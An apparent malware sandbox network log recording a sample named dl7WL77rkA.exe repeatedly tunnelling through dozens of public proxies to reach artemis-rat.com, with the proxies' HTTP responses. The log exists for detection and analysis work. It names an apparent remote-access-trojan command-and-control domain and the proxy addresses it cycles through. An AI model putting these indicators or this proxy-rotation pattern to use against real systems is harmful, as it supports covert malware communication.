                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            373192.168.2.551096104.22.50.220803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.087727070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.242331028 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            374192.168.2.55087145.4.144.23241533876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.088284969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            375192.168.2.550932163.172.144.132163793876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.089534998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.732954025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.607966900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.389739037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.889925957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.405349970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.889482975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:59.905040026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            376192.168.2.55093775.119.145.154157793876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.089651108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.732964993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.623711109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            377192.168.2.5509435.252.23.22010813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.095952988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            378192.168.2.55103938.162.11.21631283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.095963955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.510152102 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            379192.168.2.550985147.75.92.251100893876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.098901987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.380642891 CET65INHTTP/1.1 200 Connection Established
                                                                                                                                                                                                                                                            Proxy-Agent: Zscaler/6.3


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            380192.168.2.550991184.185.2.1241453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.103272915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            381192.168.2.55091731.43.158.10888883876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.103971958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            382192.168.2.550789111.206.0.9981813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.104561090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.105659962 CET162INHTTP/1.1 200 Connection Established
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Server: eJet/1.4.2
                                                                                                                                                                                                                                                            X-Nat-IP: 154.16.105.38


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            383192.168.2.55100972.206.181.12341453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.106568098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            384192.168.2.551112162.214.227.68553923876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.107115030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.592312098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.139303923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            385192.168.2.551065162.241.6.97467833876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.116297007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            386192.168.2.551145185.238.228.96803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.125087976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.279345989 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            387192.168.2.551147104.21.223.181803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.126148939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.280499935 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            388192.168.2.55095146.253.143.14410803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.128473997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            389192.168.2.551043200.125.184.569993876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.129640102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.701693058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.827707052 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            390192.168.2.550191194.233.78.142355133876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.133299112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.201843977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.202414989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.202086926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:03.201828957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            391192.168.2.551166203.30.190.57803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.135915041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.293533087 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            392192.168.2.551164162.159.242.230803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.141036034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.306814909 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
